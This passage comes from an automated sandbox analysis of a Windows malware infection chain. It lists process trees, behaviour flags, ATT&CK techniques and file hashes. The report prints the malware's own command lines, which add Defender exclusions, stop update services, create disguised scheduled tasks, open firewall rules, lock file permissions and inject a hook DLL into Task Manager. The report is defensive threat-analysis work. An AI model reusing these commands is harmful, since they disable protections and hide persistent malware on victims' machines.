SeCreatePagefilePrivilege 4852 powershell.exe Token: SeBackupPrivilege 4852 powershell.exe Token: SeRestorePrivilege 4852 powershell.exe Token: SeShutdownPrivilege 4852 powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3224 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3224 wrote to memory of 2156 3224 Explorer.EXE 93 PID 3224 wrote to memory of 2156 3224 Explorer.EXE 93 PID 3224 wrote to memory of 2156 3224 Explorer.EXE 93 PID 3224 wrote to memory of 3244 3224 Explorer.EXE 94 PID 3224 wrote to memory of 3244 3224 Explorer.EXE 94 PID 3224 wrote to memory of 3244 3224 Explorer.EXE 94 PID 3224 wrote to memory of 3348 3224 Explorer.EXE 95 PID 3224 wrote to memory of 3348 3224 Explorer.EXE 95 PID 3224 wrote to memory of 3348 3224 Explorer.EXE 95 PID 3224 wrote to memory of 2568 3224 Explorer.EXE 97 PID 3224 wrote to memory of 2568 3224 Explorer.EXE 97 PID 3224 wrote to memory of 2568 3224 Explorer.EXE 97 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 3348 wrote to memory of 3212 3348 465D.exe 98 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 2156 wrote to memory of 2424 2156 2ECB.exe 100 PID 3224 wrote to memory of 4724 3224 Explorer.EXE 101 PID 3224 wrote to memory of 4724 3224 Explorer.EXE 101 PID 3224 wrote to memory of 4724 3224 Explorer.EXE 101 PID 3224 wrote to memory of 3544 3224 Explorer.EXE 103 PID 3224 wrote to memory of 3544 3224 Explorer.EXE 103 PID 3224 wrote to memory of 3544 3224 Explorer.EXE 103 PID 3224 wrote to memory of 2824 3224 Explorer.EXE 104 PID 3224 wrote to memory of 2824 3224 Explorer.EXE 104 PID 2824 wrote to memory of 3364 2824 regsvr32.exe 106 PID 2824 wrote to memory of 3364 2824 regsvr32.exe 106 PID 2824 wrote to memory of 3364 2824 regsvr32.exe 106 PID 2568 wrote to memory of 4372 2568 4C59.exe 107 PID 2568 wrote to memory of 4372 2568 4C59.exe 107 PID 2568 wrote to memory of 4372 2568 4C59.exe 107 PID 3224 wrote to memory of 3304 3224 Explorer.EXE 117 PID 3224 wrote to memory of 3304 3224 Explorer.EXE 117 PID 3224 wrote to memory of 4428 3224 Explorer.EXE 108 PID 3224 wrote to memory of 4428 3224 Explorer.EXE 108 PID 3224 wrote to memory of 4428 3224 Explorer.EXE 108 PID 3224 wrote to memory of 4428 3224 Explorer.EXE 108 PID 4372 wrote to memory of 1968 4372 yiueea.exe 116 PID 4372 wrote to memory of 1968 4372 yiueea.exe 116 PID 4372 wrote to memory of 1968 4372 yiueea.exe 116 PID 4372 wrote to memory of 4612 4372 yiueea.exe 110 PID 4372 wrote to memory of 4612 4372 yiueea.exe 110 PID 4372 wrote to memory of 4612 4372 yiueea.exe 110 PID 3224 wrote to memory of 4132 3224 Explorer.EXE 114 PID 3224 wrote to memory of 4132 3224 Explorer.EXE 114 PID 3224 wrote to memory of 4132 3224 Explorer.EXE 114 PID 2424 wrote to memory of 380 2424 2ECB.exe 115 PID 2424 wrote to memory of 380 2424 2ECB.exe 115 PID 2424 wrote to memory of 380 2424 2ECB.exe 115 PID 4612 wrote to memory of 1592 4612 cmd.exe 119 PID 4612 wrote to memory of 1592 4612 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\2ECB.exeC:\Users\Admin\AppData\Local\Temp\2ECB.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\2ECB.exeC:\Users\Admin\AppData\Local\Temp\2ECB.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\927271cb-a2b6-4a7a-b0d1-87c713c0c5c6" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:380
-
-
C:\Users\Admin\AppData\Local\Temp\2ECB.exe"C:\Users\Admin\AppData\Local\Temp\2ECB.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\2ECB.exe"C:\Users\Admin\AppData\Local\Temp\2ECB.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:3360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 5686⤵
- Program crash
PID:4940
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34A8.exeC:\Users\Admin\AppData\Local\Temp\34A8.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\465D.exeC:\Users\Admin\AppData\Local\Temp\465D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
PID:3492
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1523⤵
- Program crash
PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\4C59.exeC:\Users\Admin\AppData\Local\Temp\4C59.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:N"5⤵PID:4344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1592
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\577f58beff" /P "Admin:N"5⤵PID:3524
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\577f58beff" /P "Admin:R" /E5⤵PID:4672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1204
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:R" /E5⤵PID:4456
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F4⤵
- Creates scheduled task(s)
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3624 -
C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe"C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5207.exeC:\Users\Admin\AppData\Local\Temp\5207.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\57A6.exeC:\Users\Admin\AppData\Local\Temp\57A6.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\57A6.exe"C:\Users\Admin\AppData\Local\Temp\57A6.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4392
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:3188
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:4412
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3040
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4528
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:1760
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:4888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3468
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
PID:4456
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:5048
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:3240 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:4500
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:5036
-
-
-
-
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\5C5A.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\5C5A.dll3⤵
- Loads dropped DLL
PID:3364
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:4428
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\6AB3.exeC:\Users\Admin\AppData\Local\Temp\6AB3.exe2⤵
- Executes dropped EXE
PID:3304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1540
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2296
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:624
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4316
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2020
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3196
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:3088
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4680
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3536
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3384
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:520
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3180
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4820
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1952
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2816
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1292
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:3712
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\grrhfnlxagtw.xml"2⤵
- Creates scheduled task(s)
PID:5052
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
PID:3232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3348 -ip 33481⤵PID:3004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3360 -ip 33601⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exeC:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe1⤵
- Executes dropped EXE
PID:3588
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:232
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4560
-
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exeC:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe1⤵
- Executes dropped EXE
PID:4760
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
PID:4828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5b3cc1eab5e14e2d7a01804b22ecf4043
SHA11883aeaac8649c5b6848f2131ec56464b964f8fc
SHA25625d844b5a1806454aa4b221dc31f3423928ffcd816771e7d01797831e0a29324
SHA512adaf9402ac330d8daae46af707650d579c9f20c1080c6d97fd38f8e119a59793dd3ec3998fd2fbea3a578087d64b831cd25664e3442e236477a3b79fe6d387f2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5e16be1f6deb5efa3830bc94cc60203ef
SHA138856b3f3ae564d27f02fbca7ae88261cf5288c8
SHA2561a54fe4e4f52856cb0e55fefb91d7b9eaca46ad9db5d8361d74d9dfc32c7452e
SHA512b0419b4f6eb2a0061d4a3800cca1193b8d06d061ae53bca1f7c2ddc71e2d2cb51d932058c39d66f4e991d64058b6a239b813befdddf71d0475318c30324f2dce
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD51df140658e731f100105ae990defc25b
SHA1b97dd64ff6238d7512491fd33356ed94509c35d2
SHA256bdda98afa8946e6c0d97dc06c0c39a14f1c87055000a1fe72f11929207ac7017
SHA5129a15a6a2fa413f26b88c7613a4f81065261d95300209699a82a0507ee2e48ccda84819116c0645cc146360d27eef50a1b3515e6658b85e40513fd4cea4d2d2ee
-
Filesize
738KB
MD57284de10c970ef4b23460ad9c8b125fe
SHA166c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA2567ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA5120425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7
-
Filesize
2KB
MD5c671d50d589ce7be9ad3ff4035e6ad63
SHA188cdc154077c8264149cb8b19e16ba07901e1dd6
SHA256fb07948cb75ee2b9967b1a6386eb53a46573ae99c9ecb46f2b377af8df1b7568
SHA512a40a7500a7896f2200754499c00e74a7b8a53578808d5408e1e31733d03cdeb2b3e520c1d9b71537f2877093b686811b8e20cbb5c8061e4d3e1d75a161cebae9
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
1KB
MD583c93526c4fe7b8def6c10688ad05f98
SHA1c766df0c8ef17f30313859a5579062caa3d76bc6
SHA2561685e6e8b2622a7e9686b2441ffba0e28b25f94b16d0ebff334d414b733ca665
SHA512a2ed44db9908e79bfe70f1cf562b426a23831c37c26136a6a6d73d635aefbeb4a17c8b670a9ca8137999d79d07fe68c6de173b677bf040876b777e7b50e42158
-
Filesize
249KB
MD57cf440f4c5d2da2005122a4343688f65
SHA137bd78e00d8b2d992ac731725578521325438add
SHA25655b49dc6f04ae9537e67ec505a45606608092ee494afa3c79e8fcc315b780366
SHA512080dac9ddfe4a0e497bc3b5e1cd11eb95dc4e342379290039e95806581dbe3c02f62aed0030a97d371daa9623da64399b522abbe2fe64cd827f22ec47c2e29f8
-
Filesize
249KB
MD57cf440f4c5d2da2005122a4343688f65
SHA137bd78e00d8b2d992ac731725578521325438add
SHA25655b49dc6f04ae9537e67ec505a45606608092ee494afa3c79e8fcc315b780366
SHA512080dac9ddfe4a0e497bc3b5e1cd11eb95dc4e342379290039e95806581dbe3c02f62aed0030a97d371daa9623da64399b522abbe2fe64cd827f22ec47c2e29f8
-
Filesize
249KB
MD57cf440f4c5d2da2005122a4343688f65
SHA137bd78e00d8b2d992ac731725578521325438add
SHA25655b49dc6f04ae9537e67ec505a45606608092ee494afa3c79e8fcc315b780366
SHA512080dac9ddfe4a0e497bc3b5e1cd11eb95dc4e342379290039e95806581dbe3c02f62aed0030a97d371daa9623da64399b522abbe2fe64cd827f22ec47c2e29f8
-
Filesize
249KB
MD57cf440f4c5d2da2005122a4343688f65
SHA137bd78e00d8b2d992ac731725578521325438add
SHA25655b49dc6f04ae9537e67ec505a45606608092ee494afa3c79e8fcc315b780366
SHA512080dac9ddfe4a0e497bc3b5e1cd11eb95dc4e342379290039e95806581dbe3c02f62aed0030a97d371daa9623da64399b522abbe2fe64cd827f22ec47c2e29f8
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
